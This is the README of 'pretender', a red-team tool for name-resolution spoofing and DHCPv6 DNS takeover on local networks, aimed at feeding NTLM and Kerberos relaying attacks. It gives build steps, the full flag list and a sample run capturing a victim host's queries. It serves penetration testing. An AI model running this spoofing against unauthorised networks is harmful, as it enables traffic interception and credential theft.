Pretender

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS, LLMNR and NetBIOS-NS spoofing.

pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket’s ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.

Installation

git clone https://github.com/RedTeamPentesting/pretender
cd pretender
go build

Usage

./pretender [OPTIONS]

Flags

  -i, --interface string           Interface to bind on, supports auto-detection by IPv4 or IPv6
  -4, --ip4 ip                     Relay IPv4 address with which queries are answered, supports auto-detection by interface or IPv6
  -6, --ip6 ip                     Relay IPv6 address with which queries are answered, supports auto-detection by interface or IPv4
      --soa-hostname string        Hostname for the SOA record (useful for Kerberos relaying)
      --no-dhcp-dns                Disable DHCPv6 DNS takeover attack (DHCPv6 and DNS)
      --no-dhcp                    Disable DHCPv6 spoofing
      --no-dns                     Disable DNS spoofing
      --no-ra                      Disable router advertisements
      --no-mdns                    Disable mDNS spoofing
      --no-netbios                 Disable NetBIOS-NS spoofing
      --no-llmnr                   Disable LLMNR spoofing
      --no-lnr                     Disable local name resolution spoofing (mDNS, LLMNR, NetBIOS-NS)
      --no-ipv6-lnr                Disable mDNS and LLMNR via IPv6 (useful with allowlist or blocklist)
      --spoof strings              Only spoof these domains, if domain starts with a dot, all subdomains with match (allowlist)
      --dont-spoof strings         Do not spoof these domains, if domain starts with a dot, all subdomains with match (blocklist)
      --spoof-for hosts            Only spoof DHCPv6 and name resolution for these hosts (allowlist of IPs or hostnames)
      --dont-spoof-for hosts       Do not spoof DHCPv6 and name resolution for these hosts (blocklist of IPs or hostnames)
      --spoof-types types          Only spoof these query types (A, AAA, ANY, SOA, all types are spoofed if empty)
      --ignore-nofqdn              Ignore DHCPv6 messages where the client did not include its FQDN (useful with allowlist or blocklists)
      --dry                        Do not spoof name resolution at all, only log queries
  -t, --ttl duration               Time to live for name resolution responses (default 1m0s)
      --lease-lifetime duration    DHCPv6 IP lease lifetime (default 1m0s)
      --router-lifetime duration   Router lifetime specified in router advertisements (default 3m0s)
      --ra-period duration         Time period between router advertisements (default 3m0s)
      --stop-after duration        Stop running after this duration
  -v, --verbose                    Print debug information
      --no-color                   Disables output styling
      --no-timestamps              Disables timestamps in the output
  -l, --log file                   Log file name
      --version                    Print version information
      --no-host-info               Do not gather host information
      --hide-ignored               Do not log ignored queries
      --redirect-stderr            Redirect stderr to stdout
      --interfaces                 List interfaces and their addresses (the other options have no effect, except for --no-color)

Examples

$ sudo ./pretender -i eth1 --no-ra
Pretender by RedTeam Pentesting built from git commit 69d85ac239
Listening on interface: eth1
IPv4 relayed to: 10.10.20.50
IPv6 relayed to: fe80::e1d8:cf1d:5df3:a7f5

16:50:19 [DHCPv6] listening via UDP on [ff02::1:2%eth1]:547
16:50:19 [mDNS] listening via UDP on [ff02::fb%eth1]:5353
16:50:19 [DNS] listening via TCP on [fe80::e1d8:cf1d:5df3:a7f5%eth1]:53
16:50:19 [mDNS] listening via UDP on 224.0.0.251:5353
16:50:19 [DNS] listening via UDP on [fe80::e1d8:cf1d:5df3:a7f5%eth1]:53
16:50:19 [LLMNR] listening via UDP on [ff02::1:3%eth1]:5355
16:50:19 [NetBIOS] listening via UDP on 10.10.20.255:137
16:50:19 [LLMNR] listening via UDP on 224.0.0.252:5355
16:50:20 [DHCPv6] responding to SOLICIT from fe80::7270:8089:988d:b114 (cl01.offsec.nl) by assigning IPv6 "fe80::8000:800:277e:5926"
16:50:20 [DHCPv6] responding to REQUEST from fe80::7270:8089:988d:b114 (cl01.offsec.nl) by assigning DNS server and IPv6 "fe80::8000:800:277e:5926"
16:50:21 [mDNS] "CL01.local" (ANY) queried by fe80::7270:8089:988d:b114 (cl01.offsec.nl)
16:50:21 [LLMNR] "CL01" (ANY) queried by 10.10.20.61 (cl01.offsec.nl)
16:50:21 [mDNS] "CL01.local" (ANY) queried by 10.10.20.61 (cl01.offsec.nl)
16:50:21 [LLMNR] "CL01" (ANY) queried by fe80::7270:8089:988d:b114 (cl01.offsec.nl, 10.10.20.61)
16:50:21 [mDNS] "CL01.local" (ANY) queried by 10.10.20.61 (cl01.offsec.nl)
16:50:21 [mDNS] "CL01.local" (ANY) queried by fe80::7270:8089:988d:b114 (cl01.offsec.nl, 10.10.20.61)
16:50:21 [LLMNR] "CL01" (ANY) queried by 10.10.20.61 (cl01.offsec.nl)
16:50:21 [LLMNR] "CL01" (ANY) queried by fe80::7270:8089:988d:b114 (cl01.offsec.nl, 10.10.20.61)
16:50:21 [mDNS] "CL01.local" (ANY) queried by fe80::7270:8089:988d:b114 (cl01.offsec.nl, 10.10.20.61)
16:50:21 [mDNS] "CL01.local" (ANY) queried by 10.10.20.61 (cl01.offsec.nl)
16:50:21 [LLMNR] "CL01" (ANY) queried by 10.10.20.61 (cl01.offsec.nl)
16:50:21 [LLMNR] "CL01" (ANY) queried by fe80::7270:8089:988d:b114 (cl01.offsec.nl, 10.10.20.61)
16:50:21 [DNS] "v10.events.data.microsoft.com" (A) queried by fe80::8000:800:277e:5926 (10.10.20.61, PCSSystemtec)

URL list